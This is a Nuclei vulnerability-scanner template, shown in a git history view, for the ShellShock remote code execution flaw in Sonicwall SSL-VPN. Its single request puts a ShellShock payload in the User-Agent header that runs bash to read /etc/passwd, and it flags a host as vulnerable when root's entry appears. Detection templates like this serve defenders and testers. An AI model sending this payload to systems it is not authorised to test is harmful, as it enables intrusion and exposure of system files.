nuclei-templates/vulnerabilities/other/sonicwall-sslvpn-shellshock...

28 lines
675 B
YAML
Raw Normal View History

2021-01-26 10:20:46 +00:00
id: sonicwall-sslvpn-shellshock
info:
name: Sonicwall SSLVPN ShellShock RCE
author: PR3R00T
severity: critical
reference:
- https://twitter.com/chybeta/status/1353974652540882944
- https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
tags: shellshock,sonicwall,rce,vpn
2021-01-26 10:20:46 +00:00
requests:
2021-01-26 10:40:48 +00:00
- raw:
2021-01-26 10:44:17 +00:00
- |
2021-01-26 10:20:46 +00:00
GET /cgi-bin/jarrewrite.sh HTTP/1.1
Host: {{Hostname}}
User-Agent: "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'"
Accept: */*
2021-01-26 14:31:01 +00:00
matchers-condition: and
matchers:
2021-01-26 10:20:46 +00:00
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0"
2021-01-26 10:20:46 +00:00
part: body
- type: status
status:
2021-01-26 14:31:01 +00:00
- 200